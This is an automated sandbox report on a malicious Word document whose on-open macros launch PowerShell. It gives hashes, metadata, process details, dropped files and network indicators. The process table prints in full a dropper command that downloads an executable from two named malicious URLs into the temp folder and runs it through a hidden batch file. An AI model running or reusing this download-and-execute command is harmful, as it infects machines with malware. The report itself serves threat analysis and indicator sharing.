analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2cbb0ed6ff901b6b54b497ac6540abbc32e9365d59ec95fd37b700bc8fd28946

Full analysis: https://app.any.run/tasks/0833b9ae-18c8-4592-9976-3d4f16e4e76d
Verdict: Malicious activity
Analysis date: November 15, 2018, 15:23:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: Enpor Support, Template: Normal, Last Saved By: user, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Thu Nov 15 13:11:00 2018, Last Saved Time/Date: Thu Nov 15 13:12:00 2018, Number of Pages: 1, Number of Words: 18, Number of Characters: 108, Security: 0
MD5:

6715F77143D45CD1286D1B7A0AD9BEF7

SHA1:

183AA33BE25EA44B4E29757A45846EFA64A6CD91

SHA256:

2CBB0ED6FF901B6B54B497AC6540ABBC32E9365D59EC95FD37B700BC8FD28946

SSDEEP:

384:sEt1XesnEGlGeB50+0ky0NGoGFRP9K/rVXDcxcQ1yGcS2rdy5ujtMImCeX0jOR4Q:s1sCCr2yrTqISdDANspkKrag2VpE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3876)
      • cmd.exe (PID: 3220)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2632)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2632)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 3588)
      • powershell.exe (PID: 2016)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 2016)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2632)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2632)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: 39
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 125
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 108
Words: 18
Pages: 1
ModifyDate: 2018:11:15 13:12:00
CreateDate: 2018:11:15 13:11:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: user
Template: Normal
Comments: -
Keywords: -
Author: Enpor Support
Subject: -
Title: -
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2632"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2cbb0ed6ff901b6b54b497ac6540abbc32e9365d59ec95fd37b700bc8fd28946.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3876cmd /c powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''%tmp%\tmp802.exe'');<#last info#>start-process ''%tmp%\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp343.bat; start-process '%tmp%\tmp343.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2016powershell "'powershell ""<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,''C:\Users\admin\AppData\Local\Temp\tmp802.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp802.exe'';}try{waitdone(''http://movingmountainsfoods.com/huer.buer'')}catch{waitdone(''http://bomanforklift.com/huer.buer'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp343.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp343.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3220cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp343.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3588powershell "<#wait done#>function waitdone([string] $spath){(new-object system.net.webclient).downloadfile($spath,'C:\Users\admin\AppData\Local\Temp\tmp802.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp802.exe';}try{waitdone('http://movingmountainsfoods.com/huer.buer')}catch{waitdone('http://bomanforklift.com/huer.buer')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 944
Read events
1 412
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
6
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A57.tmp.cvr
MD5:
SHA256:
2632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAAB823B68DC4500F.TMP
MD5:
SHA256:
2632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFAF04874AFC0B983F.TMP
MD5:
SHA256:
2632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFD4E7BF764A1FA413.TMP
MD5:
SHA256:
2016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BQC1KM6CI60L83MHZ0OC.temp
MD5:
SHA256:
3588powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6HPVR9QE6WUI21VGENFH.temp
MD5:
SHA256:
2016powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3588powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\E02357FC7708441D4B0BE5F371F4B28961870F70binary
MD5:DA6C793FB0533AF0139A6D76C9956547
SHA256:BCEC4BFFD8EE03E0FDF1C1577EF4635AC08DB1F94CF07B0C406A6B3A171E9E1D
3588powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dac58.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2632WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$bb0ed6ff901b6b54b497ac6540abbc32e9365d59ec95fd37b700bc8fd28946.docpgc
MD5:50927460C76E4CA5001C610EC698C4F1
SHA256:547F5A099A2D1112C3EC6E1BC6E6681186F6B5FA1084C43F33CD5BB4F482B45A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3588
powershell.exe
GET
301
213.129.84.120:80
http://movingmountainsfoods.com/huer.buer
GB
html
250 b
malicious
3588
powershell.exe
GET
403
67.225.140.210:80
http://bomanforklift.com/huer.buer
US
html
337 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3588
powershell.exe
213.129.84.120:443
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
3588
powershell.exe
213.129.84.120:80
movingmountainsfoods.com
The Bunker Secure Hosting Ltd
GB
suspicious
3588
powershell.exe
67.225.140.210:80
bomanforklift.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
movingmountainsfoods.com
  • 213.129.84.120
malicious
bomanforklift.com
  • 67.225.140.210
malicious

Threats

No threats detected
No debug info